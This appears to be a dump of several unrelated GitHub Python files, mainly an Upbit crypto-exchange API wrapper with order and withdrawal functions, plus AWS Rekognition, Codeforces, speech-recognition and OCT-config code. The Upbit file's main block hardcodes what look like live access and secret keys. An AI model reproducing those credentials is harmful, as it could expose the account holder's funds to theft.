상태(wait, done, cancel)\n :param kind: 주문 유형(normal, watch)\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n # TODO : states, identifiers 관련 기능 추가 필요\n try:\n p = re.compile(r\"^\\w+-\\w+-\\w+-\\w+-\\w+$\")\n # 정확히는 입력을 대문자로 변환 후 다음 정규식을 적용해야 함\n # - r\"^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$\"\n is_uuid = len(p.findall(ticker_or_uuid)) > 0\n if is_uuid:\n url = \"https://api.upbit.com/v1/order\"\n data = {'uuid': ticker_or_uuid}\n headers = self._request_headers(data)\n result = req._send_get_request(url, headers=headers, data=data)\n else :\n\n url = \"https://api.upbit.com/v1/orders\"\n data = {'market': ticker_or_uuid,\n 'state': state,\n 'kind': kind,\n 'order_by': 'desc'\n }\n headers = self._request_headers(data)\n result = req._send_get_request(url, headers=headers, data=data)\n\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n def get_individual_order(self, uuid, contain_req=False):\n \"\"\"\n 주문 리스트 조회\n :param uuid: 주문 id\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n # TODO : states, uuids, identifiers 관련 기능 추가 필요\n try:\n url = \"https://api.upbit.com/v1/order\"\n data = {'uuid': uuid}\n headers = self._request_headers(data)\n result = req._send_get_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n # 주문 취소 접수\n def cancel_order(self, uuid, contain_req=False):\n \"\"\"\n 주문 취소\n :param uuid: 주문 함수의 리턴 값중 uuid\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/order\"\n data = {\"uuid\": uuid}\n headers = self._request_headers(data)\n result = req._send_delete_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n # 주문 \n def buy_limit_order(self, ticker, price, volume, contain_req=False):\n \"\"\"\n 지정가 매수\n :param ticker: 마켓 티커\n :param price: 주문 가격\n :param volume: 주문 수량\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/orders\"\n data = {\"market\": ticker,\n \"side\": \"bid\",\n \"volume\": str(volume),\n \"price\": str(price),\n \"ord_type\": \"limit\"}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def buy_market_order(self, ticker, price, contain_req=False):\n \"\"\"\n 시장가 매수\n :param ticker: ticker for cryptocurrency\n :param price: KRW\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/orders\"\n data = {\"market\": ticker, # market ID\n \"side\": \"bid\", # buy\n \"price\": str(price),\n \"ord_type\": \"price\"}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def sell_market_order(self, ticker, volume, contain_req=False):\n \"\"\"\n 시장가 매도 메서드\n :param ticker: 가상화폐 티커\n :param volume: 수량\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/orders\"\n data = {\"market\": ticker, # ticker\n \"side\": \"ask\", # sell\n \"volume\": str(volume),\n \"ord_type\": \"market\"}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n def sell_limit_order(self, ticker, price, volume, contain_req=False):\n \"\"\"\n 지정가 매도\n :param ticker: 마켓 티커\n :param price: 주문 가격\n :param volume: 주문 수량\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/orders\"\n data = {\"market\": ticker,\n \"side\": \"ask\",\n \"volume\": str(volume),\n \"price\": str(price),\n \"ord_type\": \"limit\"}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n #--------------------------------------------------------------------------\n # 출금\n #--------------------------------------------------------------------------\n # 개별 출금 조회\n def get_individual_withdraw_order(self, uuid: str, currency: str, contain_req=False):\n \"\"\"\n 현금 출금\n :param uuid: 출금 UUID\n :param txid: 출금 TXID\n :param currency: Currency 코드\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/withdraw\"\n data = {\"uuid\": uuid, \"currency\": currency}\n headers = self._request_headers(data)\n result = req._send_get_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n # 코인 출금하기 \n def withdraw_coin(self, currency, amount, address, secondary_address='None', transaction_type='default', contain_req=False):\n \"\"\"\n 코인 출금\n :param currency: Currency symbol\n :param amount: 주문 가격\n :param address: 출금 지갑 주소\n :param secondary_address: 2차 출금주소 (필요한 코인에 한해서)\n :param transaction_type: 출금 유형\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/withdraws/coin\"\n data = {\"currency\": currency,\n \"amount\": amount,\n \"address\": address,\n \"secondary_address\": secondary_address,\n \"transaction_type\": transaction_type}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n # 원화 출금하기\n def withdraw_cash(self, amount: str, contain_req=False):\n \"\"\"\n 현금 출금\n :param amount: 출금 액수\n :param contain_req: Remaining-Req 포함여부\n :return:\n \"\"\"\n try:\n url = \"https://api.upbit.com/v1/withdraws/krw\"\n data = {\"amount\": amount}\n headers = self._request_headers(data)\n result = req._send_post_request(url, headers=headers, data=data)\n if contain_req:\n return result\n else:\n return result[0]\n except Exception as x:\n print(x.__class__.__name__)\n return None\n\n\n #--------------------------------------------------------------------------\n # 입금 \n #--------------------------------------------------------------------------\n # 입금 리스트 조회 \n # 개별 입금 조회\n # 입금 주소 생성 요청 \n # 전체 입금 주소 조회\n # 개별 입금 주소 조회\n # 원화 입금하기\n\n\n #--------------------------------------------------------------------------\n # 서비스 정보 \n #--------------------------------------------------------------------------\n # 입출금 현황 \n def get_deposit_withdraw_status(self, contain_req=False):\n url = \"https://api.upbit.com/v1/status/wallet\"\n headers = self._request_headers()\n result = req._send_get_request(url, headers=headers)\n if contain_req:\n return result\n else:\n return result[0]\n\n\n # API키 리스트 조회\n def get_api_key_list(self, contain_req=False):\n url = \"https://api.upbit.com/v1/api_keys\"\n headers = self._request_headers()\n result = req._send_get_request(url, headers=headers)\n if contain_req:\n return result\n else:\n return result[0]\n\n\n#--------------------------------------------------------------------------\n# 티커 조회\n#--------------------------------------------------------------------------\ndef get_url_ohlcv(interval):\n \"\"\"ohlcv 요청을 위한 url을 리턴하는 함수 \n Args:\n interval (str): \"day\", \"minute1\", \"minute3\", \"minute5\", \"week\", \"month\"\n Returns:\n str: upbit api url \n \"\"\"\n\n if interval in [\"day\", \"days\"]:\n url = \"https://api.upbit.com/v1/candles/days\"\n elif interval in [\"minute1\", \"minutes1\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/1\"\n elif interval in [\"minute3\", \"minutes3\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/3\"\n elif interval in [\"minute5\", \"minutes5\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/5\"\n elif interval in [\"minute10\", \"minutes10\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/10\"\n elif interval in [\"minute15\", \"minutes15\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/15\"\n elif interval in [\"minute30\", \"minutes30\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/30\"\n elif interval in [\"minute60\", \"minutes60\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/60\"\n elif interval in [\"minute240\", \"minutes240\"]:\n url = \"https://api.upbit.com/v1/candles/minutes/240\"\n elif interval in [\"week\", \"weeks\"]:\n url = \"https://api.upbit.com/v1/candles/weeks\"\n elif interval in [\"month\", \"months\"]:\n url = \"https://api.upbit.com/v1/candles/months\"\n else:\n url = \"https://api.upbit.com/v1/candles/days\"\n\n return url\n\ndef get_tickers(fiat=\"\", is_details=False, limit_info=False, verbose=False):\n \"\"\"업비트 티커 조회\n Args:\n fiat (str, optional): Fiat (KRW, BTC, USDT). Defaults to empty string.\n limit_info (bool, optional): True: 요청 수 제한 정보 리턴, False: 요청 수 제한 정보 리턴 받지 않음. Defaults to False.\n Returns:\n tuple/list: limit_info가 True이면 튜플, False이면 리스트 객체 \n \"\"\"\n url = \"https://api.upbit.com/v1/market/all\"\n detail = \"true\" if is_details else \"false\"\n markets, req_limit_info = req._call_public_api(url, isDetails=detail)\n\n if verbose:\n tickers = [x for x in markets if x['market'].startswith(fiat)]\n else:\n tickers = [x['market'] for x in markets if x['market'].startswith(fiat)]\n\n if limit_info:\n return tickers, req_limit_info\n else:\n return tickers\n\ndef get_ohlcv(ticker=\"KRW-BTC\", interval=\"day\", count=200, to=None, period=0.1):\n MAX_CALL_COUNT = 200\n try:\n url = get_url_ohlcv(interval=interval)\n\n if to == None:\n to = dt.datetime.now()\n elif isinstance(to, str):\n to = pd.to_datetime(to).to_pydatetime()\n elif isinstance(to, pd._libs.tslibs.timestamps.Timestamp):\n to = to.to_pydatetime()\n\n to = to.astimezone(dt.timezone.utc)\n\n dfs = []\n count = max(count, 1)\n for pos in range(count, 0, -200):\n query_count = min(MAX_CALL_COUNT, pos)\n\n to = to.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n contents, req_limit_info = req._call_public_api(url, market=ticker, count=query_count, to=to)\n dt_list = [dt.datetime.strptime(x['candle_date_time_kst'], \"%Y-%m-%dT%H:%M:%S\") for x in contents]\n df = pd.DataFrame(contents, \n columns=[\n 'opening_price', \n 'high_price', \n 'low_price', \n 'trade_price',\n 'candle_acc_trade_volume', \n 'candle_acc_trade_price'],\n index=dt_list)\n df = df.sort_index()\n if df.shape[0] == 0:\n break\n dfs += [df]\n\n to = dt.datetime.strptime(contents[-1]['candle_date_time_utc'], \"%Y-%m-%dT%H:%M:%S\")\n\n if pos > 200:\n time.sleep(period)\n\n df = pd.concat(dfs).sort_index()\n df = df.rename(columns={\"opening_price\": \"open\", \n \"high_price\": \"high\", \n \"low_price\": \"low\", \n \"trade_price\": \"close\",\n \"candle_acc_trade_volume\": \"volume\", \n \"candle_acc_trade_price\": \"value\"})\n return df\n except Exception as x:\n return None\n\ndef get_current_price(ticker=\"KRW-BTC\", limit_info=False, verbose=False):\n \"\"\"현재가 정보 조회\n Args:\n ticker (str/list, optional): 단일 티커 또는 티커 리스트 Defaults to \"KRW-BTC\".\n limit_info (bool, optional): True: 요청 제한 정보 리턴. Defaults to False.\n verbose (bool, optional): True: 원본 API 파라미터 리턴. Defaults to False.\n Returns:\n [type]: [description]\n \"\"\"\n url = \"https://api.upbit.com/v1/ticker\"\n data, req_limit_info = req._call_public_api(url, markets=ticker)\n\n if isinstance(ticker, str) or (isinstance(ticker, list) and len(ticker)==1):\n # 단일 티커 \n if verbose is False:\n price = data[0]['trade_price']\n else:\n price = data[0]\n else:\n # 여러 티커로 조회한 경우 \n if verbose is False:\n price = {x['market']: x['trade_price'] for x in data}\n else:\n price = data\n\n if limit_info:\n return price, req_limit_info\n else:\n return price\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n import pprint\n\n #-------------------------------------------------------------------------\n # api key\n #-------------------------------------------------------------------------\n #with open(\"upbit.txt\") as f:\n # lines = f.readlines()\n # access = lines[0].strip()\n # secret = lines[1].strip()\n\n access = \"dcA4JFsGWHRJcqnSmGNRM3FdMCLt4J4i2dSxX7uD\"\n secret = \"QuxtgJxiyhxUz9xuuvq9O2qIdxxSclvQIas9bWWn\"\n upbit = UPBIT(access, secret)\n\n\n #-------------------------------------------------------------------------\n # 자산 \n # 전체 계좌 조회 \n balance = upbit.get_balances()\n pprint.pprint(balance)\n\n #balances = upbit.get_order(\"KRW-XRP\")\n #pprint.pprint(balances)\n\n # order = upbit.get_order('50e184b3-9b4f-4bb0-9c03-30318e3ff10a')\n # print(order)\n # # 원화 잔고 조회\n print(upbit.get_balance(ticker=\"KRW\")) # 보유 KRW\n # print(upbit.get_amount('ALL')) # 총매수금액\n # print(upbit.get_balance(ticker=\"KRW-BTC\")) # 비트코인 보유수량\n # print(upbit.get_balance(ticker=\"KRW-XRP\")) # 리플 보유수량\n\n #-------------------------------------------------------------------------\n # 주문\n # 주문 가능 정보 \n #pprint.pprint(upbit.get_chance('KRW-BTC'))\n\n # 개별 주문 조회\n #print(upbit.get_order('KRW-GRS'))\n\n # 매도\n # print(upbit.sell_limit_order(\"KRW-XRP\", 1000, 20))\n\n # 매수\n # print(upbit.buy_limit_order(\"KRW-XRP\", 200, 20))\n\n # 주문 취소\n # print(upbit.cancel_order('82e211da-21f6-4355-9d76-83e7248e2c0c'))\n\n # 시장가 주문 테스트\n # upbit.buy_market_order(\"KRW-XRP\", 10000)\n\n # 시장가 매도 테스트\n # upbit.sell_market_order(\"KRW-XRP\", 36)\n\n\n #-------------------------------------------------------------------------\n # 서비스 정보\n # 입출금 현황\n #resp = upbit.get_deposit_withdraw_status()\n #pprint.pprint(resp)\n\n # API키 리스트 조회\n resp = upbit.get_api_key_list()\n print(resp)","repo_name":"iCareLab/coins","sub_path":"ex_upbit/api_exchange.py","file_name":"api_exchange.py","file_ext":"py","file_size_in_byte":26939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"43044904773","text":"import boto3\nfrom PIL import Image # To install package: pip install Pillow\n\n\ndef ShowBoundingBoxPositions(imageHeight, imageWidth, box, rotation):\n \"\"\"Calculate the bounding box surrounding an identified face.\n\n The calculation takes the image rotation into account.\n\n :param imageHeight: Height of entire image in pixels\n :param imageWidth: Width of entire image in pixels\n :param box: Dictionary containing bounding box data points\n :param rotation: Image orientation determined by Rekognition\n \"\"\"\n\n # Calculate left and top points taking image rotation into account\n left = 0\n top = 0\n if rotation == 'ROTATE_0':\n left = imageWidth * box['Left']\n top = imageHeight * box['Top']\n \n if rotation == 'ROTATE_90':\n left = imageHeight * (1 - (box['Top'] + box['Height']))\n top = imageWidth * box['Left']\n\n if rotation == 'ROTATE_180':\n left = imageWidth - (imageWidth * (box['Left'] + box['Width']))\n top = imageHeight * (1 - (box['Top'] + box['Height']))\n\n if rotation == 'ROTATE_270':\n left = imageHeight * box['Top']\n top = imageWidth * (1- box['Left'] - box['Width'] )\n\n print('Bounding box of face:')\n print(f' Left: {round(left)}, Top: {round(top)}, '\n f'Width: {round(imageWidth * box[\"Width\"])}, '\n f'Height: {round(imageHeight * box[\"Height\"])}')\n\n\nif __name__ == \"__main__\":\n \"\"\"Exercise the Rekognition recognize_celebrities() method and \n ShowBoundingBoxPositions()\"\"\"\n\n # Set the photo variable to the image filename to process\n photo = 'CELEBRITY_PHOTO.JPG'\n\n # Extract the image width, height, and EXIF data\n try:\n with Image.open(photo) as image:\n width, height = image.size\n exif = None\n if 'exif' in image.info:\n exif = image.info['exif']\n except IOError as e:\n print(e)\n exit(1)\n print(f'File name: {photo}')\n print(f'Image width, height: {width}, {height}')\n\n # Read the entire image into memory\n try:\n with open(photo, 'rb') as f:\n image_binary = f.read()\n except IOError as e:\n print(e)\n exit(2)\n\n # Detect the celebrities in the photo\n client = boto3.client('rekognition', region_name='us-east-1')\n response = client.recognize_celebrities(Image={'Bytes': image_binary})\n\n if 'OrientationCorrection' in response:\n print(f'Image orientation: {response[\"OrientationCorrection\"]}')\n else:\n print('No estimated orientation. Check the image\\'s Exif metadata.')\n\n # List the identified celebrities\n print('Detected celebrities...')\n celebrities = response['CelebrityFaces']\n if not celebrities:\n print('No celebrities detected')\n else:\n for celebrity in celebrities:\n print(f'\\nName: {celebrity[\"Name\"]}')\n print(f'Match confidence: {celebrity[\"MatchConfidence\"]}')\n\n # List the bounding box that surrounds the face\n if 'OrientationCorrection' in response:\n ShowBoundingBoxPositions(height, width,\n celebrity['Face']['BoundingBox'],\n response['OrientationCorrection'])","repo_name":"arunmastermind/AWS-examples-using-BOTO3","sub_path":"rekognition/rekognition-image-python-image-orientation-bounding-box.py","file_name":"rekognition-image-python-image-orientation-bounding-box.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1549150385","text":"# https://codeforces.com/problemset/problem/1355/A\n\"\"\"\na2 = a1 + mx1*mn1\na3 = a2 + mx2*mx2\n\"\"\"\n\n\ndef max_min_digits(n):\n x = list(map(int, list(str(n))))\n return max(x) * min(x)\n\n\ndef a(n):\n if n == 1:\n return a1\n ai = a1\n n -= 1\n while n > 0:\n y = max_min_digits(ai)\n if y == 0: # once minimum digit becomes 0, we don't are not adding anything new, so number remains same.\n break\n ai += y\n n -= 1\n return ai\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for case in range(t):\n a1, K = map(int, input().split())\n print(a(K))\n","repo_name":"Jahnavi-Mantripragada/CodeForces","sub_path":"1355/SequenceWithDigits.py","file_name":"SequenceWithDigits.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17835107027","text":"import os\nimport pandas as pd\nimport numpy as np\nimport Levenshtein\n\nimport torch\nimport torchaudio\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\nimport gc\nfrom torchsummaryX import summary\nimport wandb\nfrom glob import glob\n\nimport torch.distributed as dist\nimport torch.utils.data as torchdata\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom modules.utils import set_random_seed, plot_attention, calc_edit_distance, indices_to_chars\nfrom modules.dataset import ToyDataset, AudioDataset, AudioDatasetTest\nfrom models.LAS import Listener, Attention, LAS\n\nimport argparse\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef parse_args(argv=None):\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('--distributed', type=bool, default=False)\n parser.add_argument(\n '--model_dir', default=os.path.join(os.path.dirname(__file__), 'weights/LAS'))\n parser.add_argument('--exp_name', default='LAS')\n parser.add_argument('--toy', default=False)\n args = parser.parse_args(argv)\n return args\nargs = parse_args()\n\nset_random_seed(seed_num=1)\n\n# multi gpu\ndistributed = args.distributed\nlocal_rank, gpu_ids = 0, [0, 1, 2, 3]\nbatch_size = 16\n\nif distributed:\n gpu_no = len(gpu_ids)\nelse:\n gpu_no = 1\n\ntry:\n local_rank = int(os.environ[\"LOCAL_RANK\"])\nexcept:\n pass\n\ndevice = f'cuda:{local_rank}' if torch.cuda.is_available() else 'cpu'\nDEVICE = device\n\nif distributed and device != 'cpu':\n torch.cuda.set_device(local_rank)\n dist.init_process_group(backend='nccl', init_method='env://')\n print('local_rank', local_rank)\n\nif device != 'cpu' and distributed:\n batch_size *= len(gpu_ids)\n\n# Global config dict.\nconfig = {\n \"batch_size\" : batch_size,\n \"num_workers\" : 24, # mac 0\n\n \"encoder_hidden_size\" : 512,\n \"locked_dropout\" : 0.35,\n \"dropout\" : 0.2,\n\n \"epochs\" : 70,\n \"lr\" : 1e-3,\n \"weight_decay\" : 5e-6,\n \"step_size\" : 3,\n \"scheduler_gamma\" : 0.5,\n}\n\nif args.toy:\n # Load the toy dataset\n X_train = np.load(\"data/f0176_mfccs_train.npy\") # (1600, 176, 26)\n X_valid = np.load(\"data/f0176_mfccs_dev.npy\") # (1600, 176, 26)\n Y_train = np.load(\"data/f0176_hw3p2_train.npy\") # (1600, 23)\n Y_valid = np.load(\"data/f0176_hw3p2_dev.npy\") # (1600, 23)\n\n # This is how you actually need to find out the different trancripts in a dataset. \n # Can you think whats going on here? Why are we using a np.unique?\n VOCAB_MAP = dict(zip(np.unique(Y_valid), range(len(np.unique(Y_valid))))) \n VOCAB_MAP[\"[PAD]\"] = len(VOCAB_MAP)\n VOCAB = list(VOCAB_MAP.keys()) # 43 unique characters\n\n SOS_TOKEN = VOCAB_MAP[\"[SOS]\"]\n EOS_TOKEN = VOCAB_MAP[\"[EOS]\"]\n PAD_TOKEN = VOCAB_MAP[\"[PAD]\"]\n\n Y_train = [np.array([VOCAB_MAP[p] for p in seq]) for seq in Y_train]\n Y_valid = [np.array([VOCAB_MAP[p] for p in seq]) for seq in Y_valid]\n\nelse:\n # These are the various characters in the transcripts of the datasetW\n VOCAB = ['', \n 'A', 'B', 'C', 'D', \n 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', \n 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', \n 'U', 'V', 'W', 'X', \n 'Y', 'Z', \"'\", ' ', \n ''] # 30 unique characters\n\n VOCAB_MAP = {VOCAB[i]:i for i in range(0, len(VOCAB))}\n\n SOS_TOKEN = VOCAB_MAP[\"\"]\n EOS_TOKEN = VOCAB_MAP[\"\"]\n\n# TODO: Create the datasets and dataloaders\n# All these things are similar to HW3P2\n# You can reuse the same code\nroot = 'data/hw4p2/' \ngc.collect() \n\n# Time Masking and Frequency Masking are 2 types of transformation, you may choose to apply\ntransform = None #torchaudio.transforms.SlidingWindowCmn()\nif args.toy:\n train_data = ToyDataset(\"train\", X_train, Y_train)\n val_data = ToyDataset(\"valid\", X_valid, Y_valid)\nelse:\n train_data = AudioDataset(root, VOCAB, [\"train-clean-100\"], transform=transform)\n val_data = AudioDataset(root, VOCAB, [\"dev-clean\"], transform=transform)\ntest_data = AudioDatasetTest(root, VOCAB, \"test-clean\", transform=transform)\n\n\n\ntrain_sampler = None\nif distributed:\n train_sampler = torchdata.distributed.DistributedSampler(train_data)\n\ntrain_loader = torch.utils.data.DataLoader(train_data, num_workers= config['num_workers'],\n batch_size=config['batch_size'], pin_memory=True,\n shuffle=(train_sampler is None), sampler=train_sampler, \n collate_fn=train_data.collate_fn)\n\nval_loader = torch.utils.data.DataLoader(val_data, num_workers=config['num_workers'],\n batch_size=config['batch_size'], pin_memory=True,\n shuffle=False, collate_fn=val_data.collate_fn)\n\ntest_loader = torch.utils.data.DataLoader(test_data, num_workers=config['num_workers'], \n batch_size=config['batch_size'], pin_memory=True, \n shuffle=False, collate_fn=test_data.collate_fn)\n\nprint(\"Batch size: \", config['batch_size'])\nprint(\"Train dataset samples = {}, batches = {}\".format(train_data.__len__(), len(train_loader)))\nprint(\"Val dataset samples = {}, batches = {}\".format(val_data.__len__(), len(val_loader)))\nprint(\"Test dataset samples = {}, batches = {}\".format(test_data.__len__(), len(test_loader)))\n\n# The sanity check for shapes also are similar\n# sanity check\nfor data in train_loader:\n x, y, lx, ly = data\n # print(x.shape, y.shape, lx.shape, ly.shape)\n # [batch_size, 1658, 15] [batch_size, 246] [batch_size] [batch_size]\n break \n# for data in test_loader:\n# x_test, lx_test = data\n# print(x_test.shape, lx_test.shape)\n# # [batch_size, 1047, 15] [batch_size]\n# break \ninput_size = 15\n\n# Encoder Check\n# encoder_hidden_size = 256\n# encoder = Listener(input_size, encoder_hidden_size, 0)# TODO: Initialize Listener\n# print(encoder)\n# # summary(encoder, x.to(DEVICE), lx)\n# del encoder\n\n\n# Baseline LAS has the following configuration:\n# Encoder bLSTM/pbLSTM Hidden Dimension of 512 (256 per direction)\n# Decoder Embedding Layer Dimension of 256\n# Decoder Hidden Dimension of 512 \n# Decoder Output Dimension of 128\n# Attention Projection Size of 128\n# Feel Free to Experiment with this \n\nmodel = LAS(\n # Initialize your model \n # Read the paper and think about what dimensions should be used\n # You can experiment on these as well, but they are not requried for the early submission\n # Remember that if you are using weight tying, some sizes need to be the same\n input_size, encoder_hidden_size=config['encoder_hidden_size'],\n vocab_size=len(VOCAB), embed_size=256,\n decoder_hidden_size=512, decoder_output_size=128, projection_size=128,\n locked_dropout=config['locked_dropout'], dropout=config['dropout'],\n device=DEVICE,\n)\n\nmodel = model.to(DEVICE)\nif distributed:\n model = DDP(model, device_ids=[local_rank])\n# print(model)\n\nsummary(model, \n x=x.to(DEVICE), \n x_lens=lx, \n y=y.to(DEVICE))\n\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=config['lr'], amsgrad=True, weight_decay=config['weight_decay'])\ncriterion = torch.nn.CrossEntropyLoss(reduction='none') # Why are we using reduction = 'none' ? \nscaler = torch.cuda.amp.GradScaler()\n# Optional: Create a custom class for a Teacher Force Schedule \nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', min_lr=2e-8, \n patience=config['step_size'], factor=config['scheduler_gamma'])\n\n\n# Optional: Load your best model Checkpoint here\npath = os.path.join(args.model_dir, 'checkpoint' + '.pth')\ncheckpoint = torch.load(path, map_location=device)\nmodel.load_state_dict(checkpoint['model_state_dict'])\n\n\n# TODO: Create a testing function similar to validation \ndef make_string(predictions, vocab):\n pred_strs = []\n for i in range(predictions.shape[0]):\n pred_sliced = indices_to_chars(predictions[i], vocab)\n pred_string = \"\".join(pred_sliced)\n pred_strs.append(pred_string)\n\n return pred_strs\n\ndef predict(model, test_loader):\n\n model.eval()\n batch_bar = tqdm(total=len(test_loader), dynamic_ncols=True, position=0, leave=False, desc='Test', ncols=5)\n test_results = []\n \n for i, (x, lx) in enumerate(test_loader):\n x, lx = x.to(DEVICE), lx.to(DEVICE)\n\n with torch.no_grad():\n predictions, attentions = model(x, lx)\n \n greedy_predictions = torch.argmax(predictions, dim=2)\n pred_str = make_string(greedy_predictions, VOCAB)\n test_results.extend(pred_str)\n \n batch_bar.update()\n\n del x, lx\n \n batch_bar.close()\n return test_results\n\npredictions = predict(model, test_loader)\n# TODO: Create a file with all predictions \ndf = pd.read_csv('data/hw4p2/test-clean/transcript/random_submission.csv')\ndf.label = predictions\ndf.rename(columns={\"index\": \"id\"}, inplace=True)\n\ndf.to_csv('HW4P2/results/submission' + args.exp_name + '.csv', index = False)\n# TODO: Submit to Kaggle\n#!kaggle competitions submit -c 11-785-f22-hw3p2 -f results/submission_early.csv","repo_name":"JwaYounkyung/CMU_IDL","sub_path":"HW4P2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3613405361","text":"from Pipe_And_Filter_Autosection.classes.FileManager import FileManager as FM\nimport configparser\nimport xml.etree.ElementTree as ET\nimport numpy as np\n\nclass OCTScanConfig:\n \"\"\"\n\n Args:\n\n Attributes:\n sp (): dictionary of the scan parameters file\n num_scanlines ():\n y_data ():\n x_filt ():\n y_filt ():\n filter_name (str): name of filter applied if any.\n attr2 (:obj:`int`, optional): Description of `attr2`.\n\n Properties:\n num_channels: 3\n seg_size: 50,000\n\n Todo:\n Make a method to return all the datasets that have already been cut\n \"\"\"\n\n @staticmethod\n def height_fit_coeff_read_func(strOrCSV):\n # strOrCSV is either a comma delimited string of numberical coefficients or it is a filepath to the OCT_ScanConfig file where the coefficients are held\n coeff = np.fromstring(strOrCSV, sep=',')\n if coeff.size == 0:\n coeff_oct_sc = OCTScanConfig(strOrCSV)\n coeff = coeff_oct_sc._secp['height_fit_coefficients']\n return coeff\n\n # values are functions that should be performed for certain keys\n key_types = {'num_b_scans_estimate': int, 'section_alg': str, 'height_fit_coefficients': height_fit_coeff_read_func.__func__}\n\n def write_to_file(self, key, value, heading='SCAN_SETTINGS'):\n \"\"\"write to a config file\n Args:\n key:\n value:\n heading:\n\n Returns:\n\n \"\"\"\n if heading.lower() == 'SCAN_SETTINGS'.lower():\n dict_to_write_to = self.sp\n elif heading.lower() == 'Sectioning_Parameters'.lower():\n dict_to_write_to = self._secp\n else:\n raise Exception(\"Unexpected Section Title\")\n\n FM.write_to_config_file(self.file_path, dict_to_write_to, key, value, heading)\n\n @property\n def left_trimd_crd(self):\n return self._left_trimd_crd\n\n @property\n def right_trimd_crd(self):\n return self._right_trimd_crd\n\n @property\n def num_scanlines(self):\n return self._num_scanlines\n\n @property\n def sp(self):\n return self._sp\n\n @property\n def file_path(self):\n return self._file_path\n\n def __init__(self, file_path: str = None) -> None:\n #initialize vars\n self._file_path = file_path\n self._sp = OCTScanConfig.read_config_file(file_path, \"Scan_Parameters\", self.key_types)\n self._num_scanlines = None\n self._secp = None\n try:\n self._secp = OCTScanConfig.read_config_file(file_path, 'Sectioning_Parameters', self.key_types)\n except configparser.NoOptionError or configparser.NoSectionError as e:\n pass\n self._left_trimd_crd = self.sp['left_crd'] + self.sp['start_trim']\n self._right_trimd_crd = self.sp['left_crd'] + self.sp['scan_width'] - self.sp['stop_trim']\n self.section_alg = None\n\n def set_num_scanlines(self):\n self._num_scanlines = OCTScanConfig.return_num_scanlines(None, self._sp)\n\n @staticmethod\n def read_config_file(filepath, section_title=None, key_type=None):\n # returns config if section title isn't given, otherwise it returns the config[section_title] dictionary\n config = configparser.ConfigParser()\n config.optionxform = str # makes config read files case sensitively\n config.read(filepath)\n # print(config.sections())\n if section_title is None:\n config_dict = {}\n for section_title in config.sections():\n temp_config_dict = {}\n for key, val in config[section_title].items():\n if key in key_type:\n temp_config_dict[key] = key_type[key](val)\n else:\n try:\n temp_config_dict[key] = float(val)\n except ValueError:\n temp_config_dict[key] = val\n config_dict = {**config_dict, **temp_config_dict} # combine dictionaries from all sections together\n return config_dict\n 